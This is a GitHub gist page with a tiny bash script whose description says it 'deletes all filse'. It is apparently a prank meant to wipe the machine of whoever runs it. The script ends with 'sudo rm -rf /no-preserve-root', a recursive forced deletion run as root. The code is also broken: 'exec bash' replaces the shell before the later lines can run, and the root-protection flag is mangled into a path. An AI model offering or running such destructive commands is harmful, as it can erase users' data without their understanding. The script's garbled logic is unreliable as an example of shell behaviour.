Skip to content

Instantly share code, notes, and snippets.

@fgclue
Last active April 17, 2022 21:00
Show Gist options
  • Save fgclue/2394f5385297c6b205268945a2fbe2f2 to your computer and use it in GitHub Desktop.
Save fgclue/2394f5385297c6b205268945a2fbe2f2 to your computer and use it in GitHub Desktop.
deletes all filse be scared
#!/usr/bin/env bash
exec bash
ls
echo Goodbye
sudo rm -rf /no-preserve-root
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment